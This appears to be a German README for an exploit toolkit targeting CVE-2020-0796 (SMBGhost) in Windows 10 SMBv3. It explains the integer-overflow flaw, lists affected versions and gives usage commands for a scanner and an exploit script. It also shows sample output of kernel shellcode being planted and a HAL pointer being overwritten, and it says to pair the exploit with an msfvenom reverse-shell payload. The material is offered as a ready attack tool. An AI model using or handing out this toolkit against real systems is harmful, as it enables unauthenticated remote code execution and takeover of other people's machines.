
cve-2020-0796-Exploit-Toolkit
CVE-2020-0796 wird durch einen Fehler im SMBv3-Protokoll bei der Verarbeitung bösartiger komprimierter Datenpakete verursacht. Beim Dekomprimieren der Datenpakete wird die vom Client übermittelte Länge verwendet, ohne zu prüfen, ob diese gültig ist, was letztendlich zu einem Integer-Überlauf führt. Dadurch kann ein entfernter, nicht authentifizierter Angreifer beliebigen Code auf dem Zielsystem ausführen. Diese Schwachstelle ähnelt EternalBlue (MS17-010).
Betroffene Versionen: Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64-based Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version 1909 for x64-based Systems Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation)
scanner.py Zum Scannen und Erkennen von Hosts, die anfällig für CVE-2020-0796 sind. Format: python scanner.py ip Beispiel: python scanner.py 192.168.1.2
exploit.py Greift anfällige Zielhosts an. Der Standard-PoC verursacht einen Blue Screen und muss mit einem von msfvenom generierten Reverse-Shell-PoC kombiniert werden. Format: python exploit.py -ip ip Beispiel: python exploit.py -ip 192.168.1.2
Ausgabe: [+] found low stub at phys addr 13000! [+] PML4 at 1ad000 [+] base of HAL heap at fffff79480000000 [+] ntoskrnl entry at fffff80645792010 [+] found PML4 self-ref entry 1eb [+] found HalpInterruptController at fffff79480001478 [+] found HalpApicRequestInterrupt at fffff80645cb3bb0 [+] built shellcode! [+] KUSER_SHARED_DATA PTE at fffff5fbc0000000 [+] KUSER_SHARED_DATA PTE NX bit cleared! [+] Wrote shellcode at fffff78000000a00! [+] Press a key to execute shellcode! [+] overwrote HalpInterruptController pointer, should have execution shortly...